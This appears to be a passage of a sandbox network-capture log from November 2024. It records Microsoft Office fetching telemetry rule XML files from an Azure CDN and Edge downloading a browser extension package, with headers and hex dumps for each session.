2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.5	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:40 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:40 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:40 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: f6eefceb-a01e-001e-33a0-3449ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193940Z-r178fb8d765th6bkhC1DFWr7h000000001n0000000008en7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:40 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:40 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:41 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:40 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193940Z-16547b76f7f7rtshhC1DFWrtqn0000000hh000000000w2mr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:41 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.5	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:40 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:41 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:41 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 3863d8d3-f01e-0099-536f-359171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193941Z-1749fc9bdbdhnf7rhC1DFWgd0n00000001dg00000000n1d2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:41 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.5	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:40 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:41 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:41 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 5703df49-f01e-005d-5fa0-3413ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193941Z-1749fc9bdbddrtrhhC1DFWsq8000000001hg000000007ve8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:41 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:41 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:41 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:41 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193941Z-16547b76f7fr4g8xhC1DFW9cqc0000000grg00000000mqt6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:41 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:41 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:41 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:41 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193941Z-16547b76f7f7jnp2hC1DFWfc300000000hng00000000e2wv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:41 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:41 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: bae79781-201e-0000-5fa1-34a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193942Z-1749fc9bdbdcm45lhC1DFWeab800000001a000000000efth x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:42 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:41 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: b51813c1-401e-002a-5f12-32c62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193941Z-16547b76f7flf9g6hC1DFWmcx8000000083000000000kx4a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:42 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.5	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: f8aeeb5f-a01e-0032-4aa0-341949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193942Z-1749fc9bdbdhnf7rhC1DFWgd0n00000001kg000000002b8r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:42 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:42 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 790f93ef-601e-003e-42a2-343248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193942Z-1749fc9bdbdjgplnhC1DFWhrks00000001ag00000000dg29 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:42 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	49857	142.250.185.97	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:42 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:42 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY0dlu2xL3gzZNmGhnRh6XycoJ_A9YvTK7QEx2FDsDIJWnfdzepMNdElyPyifS32FtvWSwVhqAcYmQ X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Tue, 12 Nov 2024 20:33:29 GMT Expires: Wed, 12 Nov 2025 20:33:29 GMT Cache-Control: public, max-age=31536000 Age: 83173 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-13 19:39:42 UTC	805	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
